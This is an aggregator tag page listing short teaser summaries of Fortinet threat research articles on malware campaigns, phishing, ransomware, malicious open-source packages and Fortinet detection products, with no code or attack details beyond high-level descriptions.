Tag: Fortinet Threat Research Blog

FortiGuard Labs uncovered an SEO poisoning campaign targeting Chinese users with fake software sites delivering Hiddengh0st and Winos malware.        This article has been indexed from Fortinet Threat Research Blog Read the original article: SEO Poisoning Attack Targets Chinese-Speaking Users…

Read more →

FortiGuard Labs uncovers MostereRAT’s use of phishing, EPL code, and remote access tools like AnyDesk and TightVNC to evade defenses and seize full system control.        This article has been indexed from Fortinet Threat Research Blog Read the original article:…

Read more →

FortiGuard Labs uncovers MostereRAT’s use of phishing, EPL code, and remote access tools like AnyDesk and TightVNC to evade defenses and seize full system control.        This article has been indexed from Fortinet Threat Research Blog Read the original article:…

Read more →

FortiGuard Labs uncovers a phishing campaign using fake emails and UpCrypter malware to deliver RATs like PureHVNC and DCRat across industries.        This article has been indexed from Fortinet Threat Research Blog Read the original article: Phishing Campaign Targeting Companies…

Read more →

FortiGuard Labs analyzes the Gayfemboy botnet, a Mirai variant targeting global sectors. Learn its tactics, C2 methods, and Fortinet defenses.        This article has been indexed from Fortinet Threat Research Blog Read the original article: The Resurgence of IoT Malware:…

Read more →

A regionally targeted PowerShell-based campaign used phishing lures, obfuscation, and RAT delivery to infiltrate Israeli organizations. Learn how the attack chain worked—and how Fortinet blocked it.        This article has been indexed from Fortinet Threat Research Blog Read the original…

Read more →

FortiGuard Labs has uncovered a stealthy new variant of DarkCloud malware that leverages phishing emails, obfuscated JavaScript, PowerShell loaders, and process hollowing to exfiltrate credentials, payment data, and email contacts—all without dropping a file to disk.        This article has…

Read more →

Malware threats continue to infiltrate open-source software registries. FortiGuard Labs’ Q2 2025 analysis reveals persistent tactics used in malicious NPM and PyPI packages, including credential theft, obfuscation, and install-time payloads. Learn how threat actors exploit OSS and how to stay…

Read more →

Malware threats continue to infiltrate open-source software registries. FortiGuard Labs’ Q2 2025 analysis reveals persistent tactics used in malicious NPM and PyPI packages, including credential theft, obfuscation, and install-time payloads. Learn how threat actors exploit OSS and how to stay…

Read more →

FortiGuard Labs uncovers ToolShell, a sophisticated exploit chain targeting Microsoft SharePoint servers using a mix of patched and zero-day CVEs. Learn how attackers deploy GhostWebShell and KeySiphon for stealthy remote code execution and credential theft.        This article has been…

Read more →

Detailed analysis of an obfuscated web shell used in a CNI attack. Explores its structure, traffic patterns, and Fortinet’s detection and protection.        This article has been indexed from Fortinet Threat Research Blog Read the original article: In-Depth Analysis of…

Read more →

Following the Israel-Iran ceasefire, FortiGuard Labs uncovered a phishing campaign posing as a private jet evacuation service from Tel Aviv to New York. Learn how attackers used crisis-driven fear to steal personal and financial data.        This article has been…

Read more →

FortiGuard Labs analyzes NailaoLocker ransomware, a unique variant using SM2 encryption and a built-in decryption function. Learn how it works, why it matters, and how Fortinet protects against it.        This article has been indexed from Fortinet Threat Research Blog…

Read more →

FortiCNAPP Composite Alerts link weak signals into clear timelines—helping security teams detect cloud-native threats earlier and triage them faster.        This article has been indexed from Fortinet Threat Research Blog Read the original article: Improving Cloud Intrusion Detection and Triage…

Read more →

FortiCNAPP Labs uncovers Lcrypt0rx, a likely AI-generated ransomware variant used in updated H2Miner campaigns targeting cloud resources for Monero mining.        This article has been indexed from Fortinet Threat Research Blog Read the original article: Old Miner, New Tricks

Read more →

Discover how FortiSandbox 5.0 detects Dark 101 ransomware, even with sandbox evasion tactics. Learn how advanced behavioral analysis blocks file encryption, system tampering, and ransom note deployment.        This article has been indexed from Fortinet Threat Research Blog Read the…

Read more →

Explore how AI is changing the cat-and-mouse dynamic of cybersecurity, from cracking obfuscation and legacy languages to challenging new malware built with Flutter, Rust, and Delphi.        This article has been indexed from Fortinet Threat Research Blog Read the original…

Read more →

FortiGuard Labs explores how NordDragonScan utilizes an effective distribution network for dissemination. Learn more.        This article has been indexed from Fortinet Threat Research Blog Read the original article: NordDragonScan: Quiet Data-Harvester on Windows

Read more →

Threat actor impersonates Colombian government to deliver DCRAT via phishing email, using obfuscation, steganography, and PowerShell payload chains.        This article has been indexed from Fortinet Threat Research Blog Read the original article: DCRAT Impersonating the Colombian Government

Read more →

Explore a detailed technical analysis of a Havoc Remote Access Trojan (RAT) variant used in a targeted cyberattack against Middle East critical national infrastructure. Learn how Fortinet detects and protects against Havoc-based threats.        This article has been indexed from…

Read more →